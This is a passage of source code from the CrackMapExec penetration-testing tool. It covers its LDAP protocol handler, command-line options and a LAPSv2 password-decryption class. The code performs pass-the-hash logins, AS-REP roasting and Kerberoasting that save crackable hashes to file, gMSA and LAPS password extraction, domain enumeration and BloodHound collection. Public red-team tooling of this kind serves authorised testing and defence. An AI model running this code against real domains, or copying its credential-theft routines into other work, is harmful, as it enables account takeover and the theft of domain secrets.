nthash = ntlm_hash
# Create the baseDN
baseDN = ""
domainParts = domain.split(".")
for i in domainParts:
baseDN += f"dc={i},"
# Remove last ','
baseDN = baseDN[:-1]
try:
ldapConnection = ldap_impacket.LDAPConnection(f"ldap://{domain}", baseDN, domain)
ldapConnection.login(username, password, domain, lmhash, nthash)
# Connect to LDAP
out = "{domain}\\{username}:{password if password else ntlm_hash}"
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "389"
# self.logger.success(out)
return ldapConnection
except ldap_impacket.LDAPSessionError as e:
if str(e).find("strongerAuthRequired") >= 0:
# We need to try SSL
try:
ldapConnection = ldap_impacket.LDAPConnection(f"ldaps://{domain}", baseDN, domain)
ldapConnection.login(username, password, domain, lmhash, nthash)
self.logger.extra["protocol"] = "LDAPS"
self.logger.extra["port"] = "636"
# self.logger.success(out)
return ldapConnection
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.fail(
f"{domain}\\{username}:{password if password else ntlm_hash} {ldap_error_status[errorCode] if errorCode in ldap_error_status else ''}",
color="magenta" if errorCode in ldap_error_status else "red",
)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.fail(
f"{domain}\\{username}:{password if password else ntlm_hash} {ldap_error_status[errorCode] if errorCode in ldap_error_status else ''}",
color="magenta" if errorCode in ldap_error_status else "red",
)
return False
except OSError as e:
self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}")
return False
class LAPSv2Extract:
def __init__(self, data, username, password, domain, ntlm_hash, do_kerberos, kdcHost, port):
if ntlm_hash.find(":") != -1:
self.lmhash, self.nthash = ntlm_hash.split(":")
else:
self.nthash = ntlm_hash
self.lmhash = ''
self.data = data
self.username = username
self.password = password
self.domain = domain
self.do_kerberos = do_kerberos
self.kdcHost = kdcHost
self.logger = None
self.proto_logger(self.domain, port, self.domain)
def proto_logger(self, host, port, hostname):
self.logger = CMEAdapter(extra={"protocol": "LDAP", "host": host, "port": port, "hostname": hostname})
def run(self):
KDSCache = {}
self.logger.info('[-] Unpacking blob')
try:
encryptedLAPSBlob = EncryptedPasswordBlob(self.data)
parsed_cms_data, remaining = decoder.decode(encryptedLAPSBlob['Blob'], asn1Spec=rfc5652.ContentInfo())
enveloped_data_blob = parsed_cms_data['content']
parsed_enveloped_data, _ = decoder.decode(enveloped_data_blob, asn1Spec=rfc5652.EnvelopedData())
recipient_infos = parsed_enveloped_data['recipientInfos']
kek_recipient_info = recipient_infos[0]['kekri']
kek_identifier = kek_recipient_info['kekid']
key_id = KeyIdentifier(bytes(kek_identifier['keyIdentifier']))
tmp,_ = decoder.decode(kek_identifier['other']['keyAttr'])
sid = tmp['field-1'][0][0][1].asOctets().decode("utf-8")
target_sd = create_sd(sid)
except Exception as e:
logging.error('Cannot unpack msLAPS-EncryptedPassword blob due to error %s' % str(e))
return
# Check if item is in cache
if key_id['RootKeyId'] in KDSCache:
self.logger.info("Got KDS from cache")
gke = KDSCache[key_id['RootKeyId']]
else:
# Connect on RPC over TCP to MS-GKDI to call opnum 0 GetKey
stringBinding = hept_map(destHost=self.domain, remoteIf=MSRPC_UUID_GKDI, protocol='ncacn_ip_tcp')
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=self.username, password=self.password, domain=self.domain, lmhash=self.lmhash, nthash=self.nthash)
if self.do_kerberos:
self.logger.info("Connecting using kerberos")
rpctransport.set_kerberos(self.do_kerberos, kdcHost=self.kdcHost)
dce = rpctransport.get_dce_rpc()
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
self.logger.info("Connecting to %s" % stringBinding)
try:
dce.connect()
except Exception as e:
logging.error("Something went wrong, check error status => %s" % str(e))
return False
self.logger.info("Connected")
try:
dce.bind(MSRPC_UUID_GKDI)
except Exception as e:
logging.error("Something went wrong, check error status => %s" % str(e))
return False
self.logger.info("Successfully bound")
self.logger.info("Calling MS-GKDI GetKey")
resp = GkdiGetKey(dce, target_sd=target_sd, l0=key_id['L0Index'], l1=key_id['L1Index'], l2=key_id['L2Index'], root_key_id=key_id['RootKeyId'])
self.logger.info("Decrypting password")
# Unpack GroupKeyEnvelope
gke = GroupKeyEnvelope(b''.join(resp['pbbOut']))
KDSCache[gke['RootKeyId']] = gke
kek = compute_kek(gke, key_id)
self.logger.info("KEK:\t%s" % kek)
enc_content_parameter = bytes(parsed_enveloped_data["encryptedContentInfo"]["contentEncryptionAlgorithm"]["parameters"])
iv, _ = decoder.decode(enc_content_parameter)
iv = bytes(iv[0])
cek = unwrap_cek(kek, bytes(kek_recipient_info['encryptedKey']))
self.logger.info("CEK:\t%s" % cek)
plaintext = decrypt_plaintext(cek, iv, remaining)
self.logger.info(plaintext[:-18].decode('utf-16le'))
return plaintext[:-18].decode('utf-16le')
================================================
FILE: cme/protocols/ldap/proto_args.py
================================================
from argparse import _StoreTrueAction
def proto_args(parser, std_parser, module_parser):
ldap_parser = parser.add_parser('ldap', help="own stuff using LDAP", parents=[std_parser, module_parser])
ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")
no_smb_arg = ldap_parser.add_argument("--no-smb", action=get_conditional_action(_StoreTrueAction), make_required=[], help='No smb connection')
dgroup = ldap_parser.add_mutually_exclusive_group()
domain_arg = dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
no_smb_arg.make_required = [domain_arg]
egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos")
egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')
vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to to play with Kerberos")
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
vgroup.add_argument("--dc-list", action="store_true", help="Enumerate Domain Controllers")
vgroup.add_argument("--get-sid", action="store_true", help="Get domain sid")
ggroup = ldap_parser.add_argument_group("Retrevie gmsa on the remote DC", "Options to play with gmsa")
ggroup.add_argument("--gmsa", action="store_true", help="Enumerate GMSA passwords")
ggroup.add_argument("--gmsa-convert-id", help="Get the secret name of specific gmsa or all gmsa if no gmsa provided")
ggroup.add_argument("--gmsa-decrypt-lsa", help="Decrypt the gmsa encrypted value from LSA")
bgroup = ldap_parser.add_argument_group("Bloodhound scan", "Options to play with bloodhoud")
bgroup.add_argument("--bloodhound", action="store_true", help="Perform bloodhound scan")
bgroup.add_argument("-ns", '--nameserver', help="Custom DNS IP")
bgroup.add_argument("-c", "--collection", help="Which information to collect. Supported: Group, LocalAdmin, Session, Trusts, Default, DCOnly, DCOM, RDP, PSRemote, LoggedOn, Container, ObjectProps, ACL, All. You can specify more than one by separating them with a comma. (default: Default)'")
return parser
def get_conditional_action(baseAction):
class ConditionalAction(baseAction):
def __init__(self, option_strings, dest, **kwargs):
x = kwargs.pop('make_required', [])
super(ConditionalAction, self).__init__(option_strings, dest, **kwargs)
self.make_required = x
def __call__(self, parser, namespace, values, option_string=None):
for x in self.make_required:
x.required = True
super(ConditionalAction, self).__call__(parser, namespace, values, option_string)
return ConditionalAction
================================================
FILE: cme/protocols/ldap.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import hashlib
import hmac
import os
import socket
from binascii import hexlify
from datetime import datetime
from re import sub, I
from zipfile import ZipFile
from termcolor import colored
from Cryptodome.Hash import MD4
from OpenSSL.SSL import SysCallError
from bloodhound.ad.authentication import ADAuthentication
from bloodhound.ad.domain import AD
from impacket.dcerpc.v5.epm import MSRPC_UUID_PORTMAP
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE
from impacket.dcerpc.v5.samr import (
UF_ACCOUNTDISABLE,
UF_DONT_REQUIRE_PREAUTH,
UF_TRUSTED_FOR_DELEGATION,
UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION,
)
from impacket.dcerpc.v5.transport import DCERPCTransportFactory
from impacket.krb5 import constants
from impacket.krb5.kerberosv5 import getKerberosTGS, SessionKeyDecryptionError
from impacket.krb5.types import Principal, KerberosException
from impacket.ldap import ldap as ldap_impacket
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from impacket.smb import SMB_DIALECT
from impacket.smbconnection import SMBConnection, SessionError
from cme.config import process_secret, host_info_colors
from cme.connection import *
from cme.helpers.bloodhound import add_user_bh
from cme.logger import CMEAdapter, cme_logger
from cme.protocols.ldap.bloodhound import BloodHound
from cme.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB
from cme.protocols.ldap.kerberos import KerberosAttacks
ldap_error_status = {
"1": "STATUS_NOT_SUPPORTED",
"533": "STATUS_ACCOUNT_DISABLED",
"701": "STATUS_ACCOUNT_EXPIRED",
"531": "STATUS_ACCOUNT_RESTRICTION",
"530": "STATUS_INVALID_LOGON_HOURS",
"532": "STATUS_PASSWORD_EXPIRED",
"773": "STATUS_PASSWORD_MUST_CHANGE",
"775": "USER_ACCOUNT_LOCKED",
"50": "LDAP_INSUFFICIENT_ACCESS",
"0": "LDAP Signing IS Enforced",
"KDC_ERR_CLIENT_REVOKED": "KDC_ERR_CLIENT_REVOKED",
"KDC_ERR_PREAUTH_FAILED": "KDC_ERR_PREAUTH_FAILED",
}
def resolve_collection_methods(methods):
"""
Convert methods (string) to list of validated methods to resolve
"""
valid_methods = [
"group",
"localadmin",
"session",
"trusts",
"default",
"all",
"loggedon",
"objectprops",
"experimental",
"acl",
"dcom",
"rdp",
"psremote",
"dconly",
"container",
]
default_methods = ["group", "localadmin", "session", "trusts"]
# Similar to SharpHound, All is not really all, it excludes loggedon
all_methods = [
"group",
"localadmin",
"session",
"trusts",
"objectprops",
"acl",
"dcom",
"rdp",
"psremote",
"container",
]
# DC only, does not collect to computers
dconly_methods = ["group", "trusts", "objectprops", "acl", "container"]
if "," in methods:
method_list = [method.lower() for method in methods.split(",")]
validated_methods = []
for method in method_list:
if method not in valid_methods:
cme_logger.error("Invalid collection method specified: %s", method)
return False
if method == "default":
validated_methods += default_methods
elif method == "all":
validated_methods += all_methods
elif method == "dconly":
validated_methods += dconly_methods
else:
validated_methods.append(method)
return set(validated_methods)
else:
validated_methods = []
# It is only one
method = methods.lower()
if method in valid_methods:
if method == "default":
validated_methods += default_methods
elif method == "all":
validated_methods += all_methods
elif method == "dconly":
validated_methods += dconly_methods
else:
validated_methods.append(method)
return set(validated_methods)
else:
cme_logger.error("Invalid collection method specified: %s", method)
return False
class ldap(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.ldapConnection = None
self.lmhash = ""
self.nthash = ""
self.baseDN = ""
self.target = ""
self.targetDomain = ""
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.admin_privs = False
self.no_ntlm = False
self.sid_domain = ""
connection.__init__(self, args, db, host)
def proto_logger(self):
# self.logger = cme_logger
self.logger = CMEAdapter(
extra={
"protocol": "LDAP",
"host": self.host,
"port": self.args.port,
"hostname": self.hostname,
}
)
def get_ldap_info(self, host):
try:
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
ldap_url = f"{proto}://{host}"
self.logger.info(f"Connecting to {ldap_url} with no baseDN")
try:
ldap_connection = ldap_impacket.LDAPConnection(ldap_url)
if ldap_connection:
self.logger.debug(f"ldap_connection: {ldap_connection}")
except SysCallError as e:
if proto == "ldaps":
self.logger.debug(f"LDAPs connection to {ldap_url} failed - {e}")
# https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority
self.logger.debug(f"Even if the port is open, LDAPS may not be configured")
else:
self.logger.debug(f"LDAP connection to {ldap_url} failed: {e}")
return [None, None, None]
resp = ldap_connection.search(
scope=ldapasn1_impacket.Scope("baseObject"),
attributes=["defaultNamingContext", "dnsHostName"],
sizeLimit=0,
)
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
target = None
target_domain = None
base_dn = None
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "defaultNamingContext":
base_dn = str(attribute["vals"][0])
target_domain = sub(
",DC=",
".",
base_dn[base_dn.lower().find("dc=") :],
flags=I,
)[3:]
if str(attribute["type"]) == "dnsHostName":
target = str(attribute["vals"][0])
except Exception as e:
self.logger.debug("Exception:", exc_info=True)
self.logger.info(f"Skipping item, cannot process due to error {e}")
except OSError as e:
return [None, None, None]
self.logger.debug(f"Target: {target}; target_domain: {target_domain}; base_dn: {base_dn}")
return [target, target_domain, base_dn]
def get_os_arch(self):
try:
string_binding = rf"ncacn_ip_tcp:{self.host}[135]"
transport = DCERPCTransportFactory(string_binding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(
MSRPC_UUID_PORTMAP,
transfer_syntax=("71710533-BEBA-4937-8319-B5DBEF9CCC36", "1.0"),
)
except DCERPCException as e:
if str(e).find("syntaxes_not_supported") >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
self.logger.fail(f"Error retrieving os arch of {self.host}: {str(e)}")
return 0
def get_ldap_username(self):
extended_request = ldapasn1_impacket.ExtendedRequest()
extended_request["requestName"] = "1.3.6.1.4.1.4203.1.11.3" # whoami
response = self.ldapConnection.sendReceive(extended_request)
for message in response:
search_result = message["protocolOp"].getComponent()
if search_result["resultCode"] == ldapasn1_impacket.ResultCode("success"):
response_value = search_result["responseValue"]
if response_value.hasValue():
value = response_value.asOctets().decode(response_value.encoding)[2:]
return value.split("\\")[1]
return ""
def enum_host_info(self):
self.target, self.targetDomain, self.baseDN = self.get_ldap_info(self.host)
self.hostname = self.target
self.domain = self.targetDomain
# smb no open, specify the domain
if self.args.no_smb:
self.domain = self.args.domain
else:
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login("", "")
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login: {e}")
except Exception as e:
if "STATUS_NOT_SUPPORTED" in str(e):
self.no_ntlm = True
pass
if not self.no_ntlm:
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection["RequireSigning"]
self.os_arch = self.get_os_arch()
self.logger.extra["hostname"] = self.hostname
if not self.domain:
self.domain = self.hostname
try:
# DC's seem to want us to logoff first, windows workstations sometimes reset the connection
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
# Re-connect since we logged off
self.create_conn_obj()
self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
def print_host_info(self):
self.logger.debug("Printing host info for LDAP")
if self.args.no_smb:
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "389"
self.logger.display(f"Connecting to LDAP {self.hostname}")
# self.logger.display(self.endpoint)
else:
self.logger.extra["protocol"] = "SMB" if not self.no_ntlm else "LDAP"
self.logger.extra["port"] = "445" if not self.no_ntlm else "389"
signing = colored(f"signing:{self.signing}", host_info_colors[0], attrs=['bold']) if self.signing else colored(f"signing:{self.signing}", host_info_colors[1], attrs=['bold'])
smbv1 = colored(f"SMBv1:{self.smbv1}", host_info_colors[2], attrs=['bold']) if self.smbv1 else colored(f"SMBv1:{self.smbv1}", host_info_colors[3], attrs=['bold'])
self.logger.display(f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) ({signing}) ({smbv1})")
self.logger.extra["protocol"] = "LDAP"
# self.logger.display(self.endpoint)
return True
def kerberos_login(
self,
domain,
username,
password="",
ntlm_hash="",
aesKey="",
kdcHost="",
useCache=False,
):
# cme_logger.getLogger("impacket").disabled = True
self.username = username
self.password = password
self.domain = domain
self.kdcHost = kdcHost
self.aesKey = aesKey
lmhash = ""
nthash = ""
self.username = username
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(":") != -1:
lmhash, nthash = ntlm_hash.split(":")
self.hash = nthash
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
if self.password == "" and self.args.asreproast:
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(f"{hash_tgt}")
with open(self.args.asreproast, "a+") as hash_asreproast:
hash_asreproast.write(hash_tgt + "\n")
return False
if not all("" == s for s in [self.nthash, password, aesKey]):
kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)
else:
kerb_pass = ""
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
ldap_url = f"{proto}://{self.target}"
self.logger.info(f"Connecting to {ldap_url} - {self.baseDN} [1]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN)
self.ldapConnection.kerberosLogin(
username,
password,
domain,
self.lmhash,
self.nthash,
aesKey,
kdcHost=kdcHost,
useCache=useCache,
)
if self.username == "":
self.username = self.get_ldap_username()
self.check_if_admin()
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
out = f"{domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
# out = f"{domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')}"
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except SessionKeyDecryptionError:
# for PRE-AUTH account
self.logger.success(
f"{domain}\\{self.username}{' account vulnerable to asreproast attack'} {''}",
color="yellow",
)
return False
except SessionError as e:
error, desc = e.getErrorString()
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
self.logger.fail(
f"{self.domain}\\{self.username}{used_ccache} {str(error)}",
color="magenta" if error in ldap_error_status else "red",
)
return False
except (KeyError, KerberosException, OSError) as e:
self.logger.fail(
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {str(e)}",
color="red",
)
return False
except ldap_impacket.LDAPSessionError as e:
if str(e).find("strongerAuthRequired") >= 0:
# We need to try SSL
try:
# Connect to LDAPS
ldaps_url = f"ldaps://{self.target}"
self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN} [2]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.kerberosLogin(
username,
password,
domain,
self.lmhash,
self.nthash,
aesKey,
kdcHost=kdcHost,
useCache=useCache,
)
if self.username == "":
self.username = self.get_ldap_username()
self.check_if_admin()
# Prepare success credential text
out = f"{domain}\\{self.username} {self.mark_pwned()}"
self.logger.extra["protocol"] = "LDAPS"
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except SessionError as e:
error, desc = e.getErrorString()
self.logger.fail(
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {str(error)}",
color="magenta" if error in ldap_error_status else "red",
)
return False
except:
error_code = str(e).split()[-2][:-1]
self.logger.fail(
f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
color="magenta" if error_code in ldap_error_status else "red",
)
return False
else:
error_code = str(e).split()[-2][:-1]
self.logger.fail(
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
color="magenta" if error_code in ldap_error_status else "red",
)
return False
def plaintext_login(self, domain, username, password):
self.username = username
self.password = password
self.domain = domain
if self.password == "" and self.args.asreproast:
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(f"{hash_tgt}")
with open(self.args.asreproast, "a+") as hash_asreproast:
hash_asreproast.write(hash_tgt + "\n")
return False
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
ldap_url = f"{proto}://{self.target}"
self.logger.debug(f"Connecting to {ldap_url} - {self.baseDN} [3]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find("strongerAuthRequired") >= 0:
# We need to try SSL
try:
# Connect to LDAPS
ldaps_url = f"ldaps://{self.target}"
self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN} [4]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(
self.username,
self.password,
self.domain,
self.lmhash,
self.nthash,
)
self.check_if_admin()
# Prepare success credential text
out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.extra["protocol"] = "LDAPS"
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except:
error_code = str(e).split()[-2][:-1]
self.logger.fail(
f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red",
)
else:
error_code = str(e).split()[-2][:-1]
self.logger.fail(
f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red",
)
return False
except OSError as e:
self.logger.fail(f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}")
return False
def hash_login(self, domain, username, ntlm_hash):
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "389"
lmhash = ""
nthash = ""
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(":") != -1:
lmhash, nthash = ntlm_hash.split(":")
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
self.username = username
self.domain = domain
if self.hash == "" and self.args.asreproast:
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(f"{hash_tgt}")
with open(self.args.asreproast, "a+") as hash_asreproast:
hash_asreproast.write(hash_tgt + "\n")
return False
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
ldaps_url = f"{proto}://{self.target}"
self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN}")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = f"{domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}"
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find("strongerAuthRequired") >= 0:
try:
# We need to try SSL
ldaps_url = f"{proto}://{self.target}"
self.logger.debug(f"Connecting to {ldaps_url} - {self.baseDN}")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(
self.username,
self.password,
self.domain,
self.lmhash,
self.nthash,
)
self.check_if_admin()
# Prepare success credential text
out = f"{domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}"
self.logger.extra["protocol"] = "LDAPS"
self.logger.extra["port"] = "636"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except ldap_impacket.LDAPSessionError as e:
error_code = str(e).split()[-2][:-1]
self.logger.fail(
f"{self.domain}\\{self.username}:{nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red",
)
else:
error_code = str(e).split()[-2][:-1]
self.logger.fail(
f"{self.domain}\\{self.username}:{nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red",
)
return False
except OSError as e:
self.logger.fail(f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}")
return False
def create_smbv1_conn(self):
self.logger.debug(f"Creating smbv1 connection object")
try:
self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
self.smbv1 = True
if self.conn:
self.logger.debug(f"SMBv1 Connection successful")
except socket.error as e:
if str(e).find("Connection reset by peer") != -1:
self.logger.debug(f"SMBv1 might be disabled on {self.host}")
return False
except Exception as e:
self.logger.debug(f"Error creating SMBv1 connection to {self.host}: {e}")
return False
return True
def create_smbv3_conn(self):
self.logger.debug(f"Creating smbv3 connection object")
try:
self.conn = SMBConnection(self.host, self.host, None, 445)
self.smbv1 = False
if self.conn:
self.logger.debug(f"SMBv3 Connection successful")
except socket.error:
return False
except Exception as e:
self.logger.debug(f"Error creating SMBv3 connection to {self.host}: {e}")
return False
return True
def create_conn_obj(self):
if not self.args.no_smb:
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
else:
return True
def get_sid(self):
self.logger.highlight(f"Domain SID {self.sid_domain}")
def sid_to_str(self, sid):
try:
# revision
revision = int(sid[0])
# count of sub authorities
sub_authorities = int(sid[1])
# big endian
identifier_authority = int.from_bytes(sid[2:8], byteorder="big")
# If true then it is represented in hex
if identifier_authority >= 2**32:
identifier_authority = hex(identifier_authority)
# loop over the count of small endians
sub_authority = "-" + "-".join([str(int.from_bytes(sid[8 + (i * 4) : 12 + (i * 4)], byteorder="little")) for i in range(sub_authorities)])
object_sid = "S-" + str(revision) + "-" + str(identifier_authority) + sub_authority
return object_sid
except Exception:
pass
return sid
def check_if_admin(self):
# 1. get SID of the domaine
search_filter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
attributes = ["objectSid"]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
if resp and self.password != "" and self.username != "":
for attribute in resp[0][1]:
if str(attribute["type"]) == "objectSid":
sid = self.sid_to_str(attribute["vals"][0])
self.sid_domain = "-".join(sid.split("-")[:-1])
# 2. get all group cn name
search_filter = "(|(objectSid=" + self.sid_domain + "-512)(objectSid=" + self.sid_domain + "-544)(objectSid=" + self.sid_domain + "-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
attributes = ["distinguishedName"]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
for attribute in item["attributes"]:
if str(attribute["type"]) == "distinguishedName":
answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute["vals"][0] + ")"))
# 3. get member of these groups
search_filter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + "".join(answers) + "))"
attributes = [""]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
if item:
self.admin_privs = True
def getUnixTime(self, t):
t -= 116444736000000000
